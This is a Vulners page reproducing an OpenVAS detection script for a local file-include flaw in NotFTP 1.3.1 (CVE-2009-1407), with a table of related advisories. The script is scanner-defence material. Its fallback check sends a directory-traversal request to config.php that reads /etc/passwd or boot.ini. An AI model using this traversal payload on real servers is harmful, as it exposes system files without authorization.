| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
| CVE-2009-1407 | 21 Apr 200900:00 | – | circl | |
| CVE-2009-1407 | 24 Apr 200914:00 | – | cve | |
| CVE-2009-1407 | 24 Apr 200914:00 | – | cvelist | |
| EUVD-2009-1405 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-1407 | 24 Apr 200914:30 | – | nvd | |
| NotFTP 'config.php' Local File Include Vulnerability | 24 Apr 200900:00 | – | openvas | |
| Directory traversal | 24 Apr 200914:30 | – | prion | |
| NotFTP config.php本地文件包含漏洞 | 28 Apr 200900:00 | – | seebug |
| Source | Link |
|---|---|
| securityfocus | www.securityfocus.com/bid/34636 |
###############################################################################
# OpenVAS Vulnerability Test
# $Id: notftp_34636.nasl 5002 2017-01-13 10:17:13Z teissa $
#
# NotFTP 'config.php' Local File Include Vulnerability
#
# Authors
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
tag_summary = "NotFTP is prone to a local file-include vulnerability because it
fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view and execute
arbitrary local files in the context of the webserver process. This
may aid in further attacks.
NotFTP 1.3.1 is vulnerable; other versions may also be affected.";
if (description)
{
script_id(100161);
script_version("$Revision: 5002 $");
script_tag(name:"last_modification", value:"$Date: 2017-01-13 11:17:13 +0100 (Fri, 13 Jan 2017) $");
script_tag(name:"creation_date", value:"2009-04-24 20:04:08 +0200 (Fri, 24 Apr 2009)");
script_tag(name:"cvss_base", value:"6.8");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:M/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2009-1407");
script_bugtraq_id(34636);
script_name("NotFTP 'config.php' Local File Include Vulnerability");
script_category(ACT_GATHER_INFO);
script_tag(name:"qod_type", value:"remote_banner");
script_family("Web application abuses");
script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
script_dependencies("notftp_detect.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name : "summary" , value : tag_summary);
script_xref(name : "URL" , value : "http://www.securityfocus.com/bid/34636");
exit(0);
}
include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");
port = get_http_port(default:80);
if(!get_port_state(port))exit(0);
if(!can_host_php(port:port))exit(0);
if(!version = get_kb_item(string("www/", port, "/notftp")))exit(0);
if(!matches = eregmatch(string:version, pattern:"^(.+) under (/.*)$"))exit(0);
vers = matches[1];
dir = matches[2];
if(!isnull(vers) && vers >!< "unknown") {
if(version_is_equal(version: vers, test_version: "1.3.1")) {
VULN = TRUE;
}
} else {
# No version found, try to exploit.
if(!isnull(dir)) {
foreach file (make_list("etc/passwd", "boot.ini")) {
url = string(dir, "/config.php?newlang=kacper&languages[kacper][file]=../../../../../../../../", file);
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if( buf == NULL )continue;
if(egrep(pattern:"(root:.*:0:[01]:|\[boot loader\])", string: buf))
{
VULN = TRUE;
break;
}
}
}
}
if(VULN) {
security_message(port:port);
exit(0);
}
exit(0);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation